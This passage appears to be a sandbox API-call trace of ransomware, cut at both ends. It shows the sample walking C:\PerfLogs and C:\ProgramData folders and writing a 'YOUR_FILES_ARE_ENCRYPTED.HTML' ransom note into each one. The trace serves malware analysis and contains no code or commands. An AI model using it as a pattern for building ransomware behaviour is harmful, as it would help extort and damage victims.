lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.742] wnsprintfW (in: pszDest=0x650330, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\PerfLogs") returned 15 [0104.742] GetProcessHeap () returned 0x600000 [0104.742] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x660338 [0104.742] lstrcpyW (in: lpString1=0x660338, lpString2="\\\\?\\C:\\PerfLogs" | out: lpString1="\\\\?\\C:\\PerfLogs") returned="\\\\?\\C:\\PerfLogs" [0104.742] lstrcatW (in: lpString1="\\\\?\\C:\\PerfLogs", lpString2="\\*" | out: lpString1="\\\\?\\C:\\PerfLogs\\*") returned="\\\\?\\C:\\PerfLogs\\*" [0104.742] FindFirstFileW (in: lpFileName="\\\\?\\C:\\PerfLogs\\*", lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbaec25, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xbaec25, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0104.742] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbaec25, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xbaec25, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="..", cAlternateFileName="")) returned 1 [0104.743] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbaec25, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xbaec25, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="..", cAlternateFileName="")) returned 0 [0104.743] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0104.743] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\PerfLogs\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 45 [0104.743] GetProcessHeap () returned 0x600000 [0104.743] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x670340 [0104.743] CreateFileW (lpFileName="\\\\?\\C:\\PerfLogs\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\perflogs\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0104.743] WriteFile (in: hFile=0x2fc, lpBuffer=0x670340*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f708, lpOverlapped=0x0 | out: lpBuffer=0x670340*, lpNumberOfBytesWritten=0x19f708*=0x3c00, lpOverlapped=0x0) returned 1 [0104.744] CloseHandle (hObject=0x2fc) returned 1 [0104.744] GetProcessHeap () returned 0x600000 [0104.744] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0104.744] GetProcessHeap () returned 0x600000 [0104.744] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x660338 | out: hHeap=0x600000) returned 1 [0104.745] FindNextFileW (in: hFindFile=0x6269f8, lpFindFileData=0x19f750 | out: lpFindFileData=0x19f750*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x67e1a80f, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x67e1a80f, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f7ac, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0104.745] FindNextFileW (in: hFindFile=0x6269f8, lpFindFileData=0x19f750 | out: lpFindFileData=0x19f750*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x1b83b055, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b83b055, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f7ac, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0104.745] FindNextFileW (in: hFindFile=0x6269f8, lpFindFileData=0x19f750 | out: lpFindFileData=0x19f750*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x387f5bb4, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x387f5bb4, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f7ac, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0104.745] StrStrIW (lpFirst="ProgramData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.745] wnsprintfW (in: pszDest=0x650330, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData") returned 18 [0104.745] GetProcessHeap () returned 0x600000 [0104.745] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x660338 [0104.747] lstrcpyW (in: lpString1=0x660338, lpString2="\\\\?\\C:\\ProgramData" | out: lpString1="\\\\?\\C:\\ProgramData") returned="\\\\?\\C:\\ProgramData" [0104.747] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\*") returned="\\\\?\\C:\\ProgramData\\*" [0104.747] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\*", lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x387f5bb4, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x387f5bb4, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0104.747] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x387f5bb4, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x387f5bb4, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="..", cAlternateFileName="")) returned 1 [0104.747] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x130, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0104.747] StrStrIW (lpFirst="Application Data", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.747] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Application Data") returned 35 [0104.747] GetProcessHeap () returned 0x600000 [0104.747] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0104.747] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\ProgramData\\Application Data" | out: lpString1="\\\\?\\C:\\ProgramData\\Application Data") returned="\\\\?\\C:\\ProgramData\\Application Data" [0104.747] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Application Data", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Application Data\\*") returned="\\\\?\\C:\\ProgramData\\Application Data\\*" [0104.748] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Application Data\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x74447960, ftCreationTime.dwLowDateTime=0x74459310, ftCreationTime.dwHighDateTime=0x76800a13, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x260026, ftLastWriteTime.dwLowDateTime=0x620890, ftLastWriteTime.dwHighDateTime=0x2fc, nFileSizeHigh=0x20002, nFileSizeLow=0x6208b6, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="(*̸f\x19", cAlternateFileName="翿")) returned 0xffffffff [0104.748] GetProcessHeap () returned 0x600000 [0104.748] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0104.748] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcb9c8f, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcb9c8f, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x130, cFileName="Comms", cAlternateFileName="")) returned 1 [0104.748] StrStrIW (lpFirst="Comms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.748] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Comms") returned 24 [0104.748] GetProcessHeap () returned 0x600000 [0104.748] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0104.748] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\ProgramData\\Comms" | out: lpString1="\\\\?\\C:\\ProgramData\\Comms") returned="\\\\?\\C:\\ProgramData\\Comms" [0104.748] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Comms", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Comms\\*") returned="\\\\?\\C:\\ProgramData\\Comms\\*" [0104.748] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Comms\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcb9c8f, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcb9c8f, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0104.748] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcb9c8f, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcb9c8f, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0104.748] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcb9c8f, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcb9c8f, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 0 [0104.748] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0104.748] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Comms\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 54 [0104.748] GetProcessHeap () returned 0x600000 [0104.748] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x681350 [0104.748] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Comms\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\comms\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0104.749] WriteFile (in: hFile=0x300, lpBuffer=0x681350*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x681350*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0104.750] CloseHandle (hObject=0x300) returned 1 [0104.750] GetProcessHeap () returned 0x600000 [0104.750] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x681350 | out: hHeap=0x600000) returned 1 [0104.750] GetProcessHeap () returned 0x600000 [0104.750] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0104.751] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x130, cFileName="Desktop", cAlternateFileName="")) returned 1 [0104.751] StrStrIW (lpFirst="Desktop", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.751] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Desktop") returned 26 [0104.751] GetProcessHeap () returned 0x600000 [0104.751] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0104.752] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\ProgramData\\Desktop" | out: lpString1="\\\\?\\C:\\ProgramData\\Desktop") returned="\\\\?\\C:\\ProgramData\\Desktop" [0104.752] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Desktop", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Desktop\\*") returned="\\\\?\\C:\\ProgramData\\Desktop\\*" [0104.752] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Desktop\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcb9c8f, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcb9c8f, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="翿")) returned 0xffffffff [0104.752] GetProcessHeap () returned 0x600000 [0104.752] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0104.752] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x130, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0104.752] StrStrIW (lpFirst="Documents", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.752] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Documents") returned 28 [0104.752] GetProcessHeap () returned 0x600000 [0104.752] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0104.752] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\ProgramData\\Documents" | out: lpString1="\\\\?\\C:\\ProgramData\\Documents") returned="\\\\?\\C:\\ProgramData\\Documents" [0104.752] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Documents", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Documents\\*") returned="\\\\?\\C:\\ProgramData\\Documents\\*" [0104.752] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Documents\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcb9c8f, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcb9c8f, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="翿")) returned 0xffffffff [0104.752] GetProcessHeap () returned 0x600000 [0104.752] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0104.752] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x1b54cf26, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b54cf26, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x130, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0104.752] StrStrIW (lpFirst="Microsoft", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.752] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft") returned 28 [0104.752] GetProcessHeap () returned 0x600000 [0104.752] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0104.752] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\ProgramData\\Microsoft" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft") returned="\\\\?\\C:\\ProgramData\\Microsoft" [0104.752] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\*" [0104.753] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x1b54cf26, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b54cf26, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0104.753] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x1b54cf26, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b54cf26, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0104.753] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x85c5095b, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x85c5095b, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="ClickToRun", cAlternateFileName="CLICKT~1")) returned 1 [0104.753] StrStrIW (lpFirst="ClickToRun", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.753] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun") returned 39 [0104.753] GetProcessHeap () returned 0x600000 [0104.753] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x682358 [0104.753] lstrcpyW (in: lpString1=0x682358, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun" [0104.753] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\*" [0104.754] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x85c5095b, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x85c5095b, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0104.754] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x85c5095b, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x85c5095b, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="..", cAlternateFileName="")) returned 1 [0104.754] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b641eb6, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b641eb6, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="4BAD322A-C043-4DED-A97A-6FE0C4412FBE", cAlternateFileName="4BAD32~1")) returned 1 [0104.754] StrStrIW (lpFirst="4BAD322A-C043-4DED-A97A-6FE0C4412FBE", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.754] wnsprintfW (in: pszDest=0x682358, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE") returned 76 [0104.754] GetProcessHeap () returned 0x600000 [0104.754] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x693368 [0104.755] lstrcpyW (in: lpString1=0x693368, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE" [0104.755] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\*" [0104.755] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b641eb6, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b641eb6, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0x6337d0, cFileName=".", cAlternateFileName="")) returned 0x626838 [0104.755] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b641eb6, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b641eb6, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0x6337d0, cFileName="..", cAlternateFileName="")) returned 1 [0104.755] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, 